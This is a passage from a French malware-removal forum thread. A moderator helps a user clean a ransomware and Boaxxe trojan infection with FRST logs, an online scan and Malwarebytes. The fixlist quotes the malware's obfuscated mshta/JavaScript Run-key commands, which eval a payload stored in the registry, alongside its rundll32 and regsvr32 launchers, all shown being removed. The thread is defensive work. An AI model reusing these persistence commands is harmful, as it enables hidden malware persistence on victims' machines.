C:\WINDOWS\SysWOW64\oobe0.dll
2015-12-15 23:38 - 2015-12-15 23:38 - 0047511 _____ () C:\Users\mercier\AppData\Roaming\HELP_YOUR_FILES.PNG
2015-12-15 23:38 - 2015-12-15 23:38 - 0047537 _____ () C:\Users\mercier\AppData\Roaming\Microsoft\HELP_YOUR_FILES.PNG
2015-12-15 23:35 - 2015-12-15 23:35 - 0047738 _____ () C:\Users\mercier\AppData\Local\HELP_YOUR_FILES.PNG
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\**063af41a<*> => valeur supprimé(es) avec succès
HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\\**a6cc1695<*> => valeur supprimé(es) avec succès
HKU\S-1-5-21-2500834398-3325284724-1089293236-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Ummedia => valeur supprimé(es) avec succès
HKU\S-1-5-21-2500834398-3325284724-1089293236-1001\Software\Microsoft\Windows\CurrentVersion\Run\\**063af41a<*> => valeur supprimé(es) avec succès
C:\Users\mercier\AppData\Local\Ummedia => déplacé(es) avec succès
C:\Users\mercier\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_YOUR_FILES.HTML => déplacé(es) avec succès
C:\Users\mercier\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_YOUR_FILES.PNG => déplacé(es) avec succès
C:\Users\mercier\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_YOUR_FILES.TXT => déplacé(es) avec succès
C:\Users\mercier\19tcmcm0eb.mz12 => déplacé(es) avec succès
C:\Users\mercier\aq2s94s59i.jr6 => déplacé(es) avec succès
C:\Users\mercier\Downloads\4c1zjoaxu6.vmf0r => déplacé(es) avec succès
C:\Users\mercier\d2t9ax6p.mm0 => déplacé(es) avec succès
C:\Users\mercier\Documents\9z3d0l.dk6f => déplacé(es) avec succès
C:\Users\mercier\Documents\6h4pv2o94k.z5 => déplacé(es) avec succès
C:\Users\mercier\Documents\cbd5bk7ye.93x => déplacé(es) avec succès
C:\Users\mercier\Documents\17k6h779.dh9mr => déplacé(es) avec succès
C:\Users\mercier\Documents\tby6d.z3w => déplacé(es) avec succès
C:\Users\mercier\Documents\igwkb19.4vi => déplacé(es) avec succès
C:\Users\mercier\Documents\b9xkp.fz0w => déplacé(es) avec succès
C:\Users\mercier\Documents\4gcxpm.5q7w => déplacé(es) avec succès
C:\Users\mercier\Documents\holbnl6.0m5y => déplacé(es) avec succès
C:\Users\mercier\Documents\185om1c4.6h => déplacé(es) avec succès
C:\Users\mercier\Documents\flx7q71c8r.bh1 => déplacé(es) avec succès
C:\Users\mercier\Documents\a5trc2d.3jb => déplacé(es) avec succès
C:\Users\mercier\Documents\xim42.x72 => déplacé(es) avec succès
C:\Users\mercier\Documents\l4s2c.7akan => déplacé(es) avec succès
C:\Users\mercier\Documents\uu3zbfptp.2g => déplacé(es) avec succès
C:\Users\mercier\Documents\fh4asieii.6g9be => déplacé(es) avec succès
C:\Users\mercier\Documents\oq84x0pcl.5bg => déplacé(es) avec succès
C:\Users\mercier\Documents\z75w48uv9j.w1p0 => déplacé(es) avec succès
C:\Users\mercier\Documents\hy84br.vu8n => déplacé(es) avec succès
C:\Users\mercier\Documents\3jcsxll.u7df => déplacé(es) avec succès
C:\Users\mercier\Documents\9fth9hm5.gwk4l => déplacé(es) avec succès
C:\Users\mercier\Documents\6b6l13.4pz => déplacé(es) avec succès
C:\Users\mercier\Documents\4b8620.rgy2 => déplacé(es) avec succès
C:\Users\mercier\Documents\7x3rm4wi.61wy => déplacé(es) avec succès
C:\Users\mercier\Documents\8yd2ev5gx.g20pm => déplacé(es) avec succès
C:\Users\mercier\Documents\r8657qvjt.5h => déplacé(es) avec succès
C:\Users\mercier\Documents\imgaffd7.tug4 => déplacé(es) avec succès
C:\Users\mercier\Documents\6d46eb4mi.9y3r => déplacé(es) avec succès
C:\Users\mercier\Documents\aa8u1.igu04 => déplacé(es) avec succès
C:\Users\mercier\Desktop\5zlh4cuqt0.s3 => déplacé(es) avec succès
C:\Users\mercier\Desktop\9wpdttvqs6.e2m2 => déplacé(es) avec succès
C:\Users\mercier\Desktop\s9xdcl4x.pow34 => déplacé(es) avec succès
C:\Users\mercier\Desktop\gdpwzok5kh.xcdt0 => déplacé(es) avec succès
C:\Users\mercier\Desktop\c64u0r1.1p => déplacé(es) avec succès
C:\Users\mercier\Desktop\ilr78.0p0 => déplacé(es) avec succès
C:\Users\mercier\Desktop\ks1wryfn1.os5gd => déplacé(es) avec succès
C:\WINDOWS\jhg11971.18 => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0E1D3560-88FD-4B61-BFC9-3A71221AFCF5}" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0E1D3560-88FD-4B61-BFC9-3A71221AFCF5}" => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\LaunchPreSignup => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LaunchPreSignup" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{2EAB552C-3284-466E-8184-F94CA34290C7}" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2EAB552C-3284-466E-8184-F94CA34290C7}" => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Oyyatdhchr => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Oyyatdhchr" => clé supprimé(es) avec succès
C:\WINDOWS\SysWOW64\oobe0.dll => déplacé(es) avec succès
C:\Users\mercier\AppData\Roaming\HELP_YOUR_FILES.PNG => déplacé(es) avec succès
C:\Users\mercier\AppData\Roaming\Microsoft\HELP_YOUR_FILES.PNG => déplacé(es) avec succès
C:\Users\mercier\AppData\Local\HELP_YOUR_FILES.PNG => déplacé(es) avec succès
voici donc le fichier fixlog.txt:
Résultats de correction de Farbar Recovery Scan Tool (x64) Version:16-12-2015 03
Exécuté par mercier (2015-12-16 19:35:47) Run:1
Exécuté depuis C:\Users\mercier\Desktop
Profils chargés: mercier (Profils disponibles: mercier & MSSQLSERVER)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
HKLM-x32\...\Run: [**063af41a<*>] => mshta javascript:xzbJ7ypm=A5y1;kF92=new%20ActiveXObject(WScript.Shell);c1NhJLA=Cf3XsX;a7EGQ=kF92.RegRead(HKLM\\software\\Wow6432Node\\11bf3feae4\\1e31688d);c1rwnq7p=Pn;eval(a7EGQ);rVr3UiR=Y (l'élément de données a 6 caractères en plus). <===== ATTENTION (Nom de valeur avec caractères invalides)
HKLM\...\Policies\Explorer\Run: [**a6cc1695<*>] => mshta javascript:UpbsSO67A=GXmIJBA79;R3s=new%20ActiveXObject(WScript.Shell);gd8qnpO=s2;Bp6oN=R3s.RegRead(HKLM\\software\\Wow6432Node\\11bf3feae4\\1e31688d);EBQ2WPME=CvoM;eval(Bp6oN);WT8HveV4 (l'élément de données a 11 caractères en plus). <===== ATTENTION (Nom de valeur avec caractères invalides)
HKU\S-1-5-21-2500834398-3325284724-1089293236-1001\...\Run: [Ummedia] => regsvr32.exe C:\Users\mercier\AppData\Local\Ummedia\umbraSched32.dll <===== ATTENTION
HKU\S-1-5-21-2500834398-3325284724-1089293236-1001\...\Run: [**063af41a<*>] => mshta javascript:p3Ay4crJMp=B0;vL8=new%20ActiveXObject(WScript.Shell);dfdwye8bM0=yqppwnejW;z54yxt=vL8.RegRead(HKCU\\software\\11bf3feae4\\1e31688d);HAoRm9C3B=vlRoa0b;eval(z54yxt);uqErVx3e=S (l'élément de données a 6 caractères en plus). <===== ATTENTION (Nom de valeur avec caractères invalides)
C:\Users\mercier\AppData\Local\Ummedia
Startup: C:\Users\mercier\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_YOUR_FILES.HTML [2015-12-15] ()
Startup: C:\Users\mercier\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_YOUR_FILES.PNG [2015-12-15] ()
Startup: C:\Users\mercier\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_YOUR_FILES.TXT [2015-12-15] ()
2015-12-15 23:55 - 2015-12-15 23:55 - 00006108 _____ C:\Users\mercier\19tcmcm0eb.mz12
2015-12-15 23:53 - 2015-12-15 23:53 - 04391276 _____ C:\Users\mercier\aq2s94s59i.jr6
2015-12-15 23:53 - 2015-12-15 23:53 - 00014380 _____ C:\Users\mercier\Downloads\4c1zjoaxu6.vmf0r
2015-12-15 23:53 - 2015-12-15 23:53 - 00007356 _____ C:\Users\mercier\d2t9ax6p.mm0
2015-12-15 23:42 - 2015-12-15 23:42 - 00013884 _____ C:\Users\mercier\Documents\9z3d0l.dk6f
2015-12-15 23:41 - 2015-12-15 23:41 - 02544876 _____ C:\Users\mercier\Documents\6h4pv2o94k.z5
2015-12-15 23:41 - 2015-12-15 23:41 - 00827744 _____ C:\Users\mercier\Documents\cbd5bk7ye.93x
2015-12-15 23:41 - 2015-12-15 23:41 - 00464540 _____ C:\Users\mercier\Documents\17k6h779.dh9mr
2015-12-15 23:41 - 2015-12-15 23:41 - 00040412 _____ C:\Users\mercier\Documents\tby6d.z3w
2015-12-15 23:41 - 2015-12-15 23:41 - 00013084 _____ C:\Users\mercier\Documents\igwkb19.4vi
2015-12-15 23:41 - 2015-12-15 23:41 - 00001500 _____ C:\Users\mercier\Documents\b9xkp.fz0w
2015-12-15 23:41 - 2015-12-15 23:41 - 00000396 _____ C:\Users\mercier\Documents\4gcxpm.5q7w
2015-12-15 23:40 - 2015-12-15 23:40 - 111829504 _____ C:\Users\mercier\Documents\holbnl6.0m5y
2015-12-15 23:40 - 2015-12-15 23:40 - 03044624 _____ C:\Users\mercier\Documents\185om1c4.6h
2015-12-15 23:40 - 2015-12-15 23:40 - 03026064 _____ C:\Users\mercier\Documents\flx7q71c8r.bh1
2015-12-15 23:40 - 2015-12-15 23:40 - 02219932 _____ C:\Users\mercier\Documents\a5trc2d.3jb
2015-12-15 23:40 - 2015-12-15 23:40 - 02219356 _____ C:\Users\mercier\Documents\xim42.x72
2015-12-15 23:40 - 2015-12-15 23:40 - 02217212 _____ C:\Users\mercier\Documents\l4s2c.7akan
2015-12-15 23:40 - 2015-12-15 23:40 - 02196716 _____ C:\Users\mercier\Documents\uu3zbfptp.2g
2015-12-15 23:40 - 2015-12-15 23:40 - 02196684 _____ C:\Users\mercier\Documents\fh4asieii.6g9be
2015-12-15 23:40 - 2015-12-15 23:40 - 02194332 _____ C:\Users\mercier\Documents\oq84x0pcl.5bg
2015-12-15 23:40 - 2015-12-15 23:40 - 02143772 _____ C:\Users\mercier\Documents\z75w48uv9j.w1p0
2015-12-15 23:40 - 2015-12-15 23:40 - 01742680 _____ C:\Users\mercier\Documents\hy84br.vu8n
2015-12-15 23:40 - 2015-12-15 23:40 - 01497860 _____ C:\Users\mercier\Documents\3jcsxll.u7df
2015-12-15 23:40 - 2015-12-15 23:40 - 01081844 _____ C:\Users\mercier\Documents\9fth9hm5.gwk4l
2015-12-15 23:40 - 2015-12-15 23:40 - 01031152 _____ C:\Users\mercier\Documents\6b6l13.4pz
2015-12-15 23:40 - 2015-12-15 23:40 - 00921952 _____ C:\Users\mercier\Documents\4b8620.rgy2
2015-12-15 23:40 - 2015-12-15 23:40 - 00844032 _____ C:\Users\mercier\Documents\7x3rm4wi.61wy
2015-12-15 23:40 - 2015-12-15 23:40 - 00368236 _____ C:\Users\mercier\Documents\8yd2ev5gx.g20pm
2015-12-15 23:40 - 2015-12-15 23:40 - 00163468 _____ C:\Users\mercier\Documents\r8657qvjt.5h
2015-12-15 23:40 - 2015-12-15 23:40 - 00136140 _____ C:\Users\mercier\Documents\imgaffd7.tug4
2015-12-15 23:40 - 2015-12-15 23:40 - 00002332 _____ C:\Users\mercier\Documents\6d46eb4mi.9y3r
2015-12-15 23:40 - 2015-12-15 23:40 - 00000908 _____ C:\Users\mercier\Documents\aa8u1.igu04
2015-12-15 23:39 - 2015-12-15 23:39 - 01191892 _____ C:\Users\mercier\Desktop\5zlh4cuqt0.s3
2015-12-15 23:39 - 2015-12-15 23:39 - 00013612 _____ C:\Users\mercier\Desktop\9wpdttvqs6.e2m2
2015-12-15 23:39 - 2015-12-15 23:39 - 00001212 _____ C:\Users\mercier\Desktop\s9xdcl4x.pow34
2015-12-15 23:39 - 2015-12-15 23:39 - 00000764 _____ C:\Users\mercier\Desktop\gdpwzok5kh.xcdt0
2015-12-15 23:39 - 2015-12-15 23:39 - 00000636 _____ C:\Users\mercier\Desktop\c64u0r1.1p
2015-12-15 23:38 - 2015-12-15 23:38 - 00010012 _____ C:\Users\mercier\Desktop\ilr78.0p0
2015-12-15 23:38 - 2015-12-15 23:38 - 00009100 _____ C:\Users\mercier\Desktop\ks1wryfn1.os5gd
2015-11-22 14:13 - 2015-11-22 14:13 - 00000010 __RSH C:\WINDOWS\jhg11971.18
Task: {0E1D3560-88FD-4B61-BFC9-3A71221AFCF5} - System32\Tasks\LaunchPreSignup => C:\Program Files (x86)\OLBPre\OLBPre.exe <==== ATTENTION
Task: {2EAB552C-3284-466E-8184-F94CA34290C7} - System32\Tasks\Oyyatdhchr => Rundll32.exe "C:\WINDOWS\SysWOW64\oobe0.dll",sbxhoqjqmt
C:\WINDOWS\SysWOW64\oobe0.dll
2015-12-15 23:38 - 2015-12-15 23:38 - 0047511 _____ () C:\Users\mercier\AppData\Roaming\HELP_YOUR_FILES.PNG
2015-12-15 23:38 - 2015-12-15 23:38 - 0047537 _____ () C:\Users\mercier\AppData\Roaming\Microsoft\HELP_YOUR_FILES.PNG
2015-12-15 23:35 - 2015-12-15 23:35 - 0047738 _____ () C:\Users\mercier\AppData\Local\HELP_YOUR_FILES.PNG
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\**063af41a<*> => valeur supprimé(es) avec succès
HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\\**a6cc1695<*> => valeur supprimé(es) avec succès
HKU\S-1-5-21-2500834398-3325284724-1089293236-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Ummedia => valeur supprimé(es) avec succès
HKU\S-1-5-21-2500834398-3325284724-1089293236-1001\Software\Microsoft\Windows\CurrentVersion\Run\\**063af41a<*> => valeur supprimé(es) avec succès
C:\Users\mercier\AppData\Local\Ummedia => déplacé(es) avec succès
C:\Users\mercier\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_YOUR_FILES.HTML => déplacé(es) avec succès
C:\Users\mercier\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_YOUR_FILES.PNG => déplacé(es) avec succès
C:\Users\mercier\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_YOUR_FILES.TXT => déplacé(es) avec succès
C:\Users\mercier\19tcmcm0eb.mz12 => déplacé(es) avec succès
C:\Users\mercier\aq2s94s59i.jr6 => déplacé(es) avec succès
C:\Users\mercier\Downloads\4c1zjoaxu6.vmf0r => déplacé(es) avec succès
C:\Users\mercier\d2t9ax6p.mm0 => déplacé(es) avec succès
C:\Users\mercier\Documents\9z3d0l.dk6f => déplacé(es) avec succès
C:\Users\mercier\Documents\6h4pv2o94k.z5 => déplacé(es) avec succès
C:\Users\mercier\Documents\cbd5bk7ye.93x => déplacé(es) avec succès
C:\Users\mercier\Documents\17k6h779.dh9mr => déplacé(es) avec succès
C:\Users\mercier\Documents\tby6d.z3w => déplacé(es) avec succès
C:\Users\mercier\Documents\igwkb19.4vi => déplacé(es) avec succès
C:\Users\mercier\Documents\b9xkp.fz0w => déplacé(es) avec succès
C:\Users\mercier\Documents\4gcxpm.5q7w => déplacé(es) avec succès
C:\Users\mercier\Documents\holbnl6.0m5y => déplacé(es) avec succès
C:\Users\mercier\Documents\185om1c4.6h => déplacé(es) avec succès
C:\Users\mercier\Documents\flx7q71c8r.bh1 => déplacé(es) avec succès
C:\Users\mercier\Documents\a5trc2d.3jb => déplacé(es) avec succès
C:\Users\mercier\Documents\xim42.x72 => déplacé(es) avec succès
C:\Users\mercier\Documents\l4s2c.7akan => déplacé(es) avec succès
C:\Users\mercier\Documents\uu3zbfptp.2g => déplacé(es) avec succès
C:\Users\mercier\Documents\fh4asieii.6g9be => déplacé(es) avec succès
C:\Users\mercier\Documents\oq84x0pcl.5bg => déplacé(es) avec succès
C:\Users\mercier\Documents\z75w48uv9j.w1p0 => déplacé(es) avec succès
C:\Users\mercier\Documents\hy84br.vu8n => déplacé(es) avec succès
C:\Users\mercier\Documents\3jcsxll.u7df => déplacé(es) avec succès
C:\Users\mercier\Documents\9fth9hm5.gwk4l => déplacé(es) avec succès
C:\Users\mercier\Documents\6b6l13.4pz => déplacé(es) avec succès
C:\Users\mercier\Documents\4b8620.rgy2 => déplacé(es) avec succès
C:\Users\mercier\Documents\7x3rm4wi.61wy => déplacé(es) avec succès
C:\Users\mercier\Documents\8yd2ev5gx.g20pm => déplacé(es) avec succès
C:\Users\mercier\Documents\r8657qvjt.5h => déplacé(es) avec succès
C:\Users\mercier\Documents\imgaffd7.tug4 => déplacé(es) avec succès
C:\Users\mercier\Documents\6d46eb4mi.9y3r => déplacé(es) avec succès
C:\Users\mercier\Documents\aa8u1.igu04 => déplacé(es) avec succès
C:\Users\mercier\Desktop\5zlh4cuqt0.s3 => déplacé(es) avec succès
C:\Users\mercier\Desktop\9wpdttvqs6.e2m2 => déplacé(es) avec succès
C:\Users\mercier\Desktop\s9xdcl4x.pow34 => déplacé(es) avec succès
C:\Users\mercier\Desktop\gdpwzok5kh.xcdt0 => déplacé(es) avec succès
C:\Users\mercier\Desktop\c64u0r1.1p => déplacé(es) avec succès
C:\Users\mercier\Desktop\ilr78.0p0 => déplacé(es) avec succès
C:\Users\mercier\Desktop\ks1wryfn1.os5gd => déplacé(es) avec succès
C:\WINDOWS\jhg11971.18 => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0E1D3560-88FD-4B61-BFC9-3A71221AFCF5}" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0E1D3560-88FD-4B61-BFC9-3A71221AFCF5}" => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\LaunchPreSignup => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LaunchPreSignup" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{2EAB552C-3284-466E-8184-F94CA34290C7}" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2EAB552C-3284-466E-8184-F94CA34290C7}" => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Oyyatdhchr => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Oyyatdhchr" => clé supprimé(es) avec succès
C:\WINDOWS\SysWOW64\oobe0.dll => déplacé(es) avec succès
C:\Users\mercier\AppData\Roaming\HELP_YOUR_FILES.PNG => déplacé(es) avec succès
C:\Users\mercier\AppData\Roaming\Microsoft\HELP_YOUR_FILES.PNG => déplacé(es) avec succès
C:\Users\mercier\AppData\Local\HELP_YOUR_FILES.PNG => déplacé(es) avec succès
Fin de Fixlog 19:35:49
merci
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 660
16 déc. 2015 à 19:41
16 déc. 2015 à 19:41
ok envoie le zip, voir fin de la procédure.
hysterial
Messages postés
6
Date d'inscription
mercredi 16 décembre 2015
Statut
Membre
Dernière intervention
17 décembre 2015
1
16 déc. 2015 à 19:58
16 déc. 2015 à 19:58
je suis un peu bloquer pour ce qui est de l'envoi du fichier car la taille max pour l'envoi est de 8Mo, hors mon fichier fait 147MO...
que me conseillez-vous dans ce cas?
que me conseillez-vous dans ce cas?
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 660
16 déc. 2015 à 20:48
16 déc. 2015 à 20:48
ok tant pis.
Fais un scan en ligne NOD32
Enregistre le rapport
Envoie le sur http://pjjoint.malekal.com
Donne le lien ici.
Fais un scan en ligne NOD32
Enregistre le rapport
Envoie le sur http://pjjoint.malekal.com
Donne le lien ici.
hysterial
Messages postés
6
Date d'inscription
mercredi 16 décembre 2015
Statut
Membre
Dernière intervention
17 décembre 2015
1
17 déc. 2015 à 19:10
17 déc. 2015 à 19:10
bonjour,
voici le résultat du scan par eset:
https://pjjoint.malekal.com/files.php?id=20151217_13m12t15v8k12
merci
voici le résultat du scan par eset:
https://pjjoint.malekal.com/files.php?id=20151217_13m12t15v8k12
merci
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 660
18 déc. 2015 à 09:16
18 déc. 2015 à 09:16
ok..
C:\FRST\Quarantine\C\Users\mercier\AppData\Local\Ummedia\umbraSched32.dll Win32/Boaxxe.CR trojan
Le PC tourne mieux ?
C:\FRST\Quarantine\C\Users\mercier\AppData\Local\Ummedia\umbraSched32.dll Win32/Boaxxe.CR trojan
Le PC tourne mieux ?
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 660
20 déc. 2015 à 19:12
20 déc. 2015 à 19:12
De rien =)
Termine par un nettoyage Malwarebyte's Anti-Malware :
Voila, c'est terminé, tu peux supprimer les programmes utilisés.
Quelques conseils :
Pour prévenir les sites malicieux, tu peux installer Blockulicious : https://forum.malekal.com/viewtopic.php?t=46656&start=
Comment sécuriser son ordinateur : http://forum.malekal.com/comment-securiser-son-ordinateur.html
Termine par un nettoyage Malwarebyte's Anti-Malware :
- Tutorial Malwarebytes version gratuite
- Tutorial Malwarebytes version payante
Voila, c'est terminé, tu peux supprimer les programmes utilisés.
Quelques conseils :
Pour prévenir les sites malicieux, tu peux installer Blockulicious : https://forum.malekal.com/viewtopic.php?t=46656&start=
Comment sécuriser son ordinateur : http://forum.malekal.com/comment-securiser-son-ordinateur.html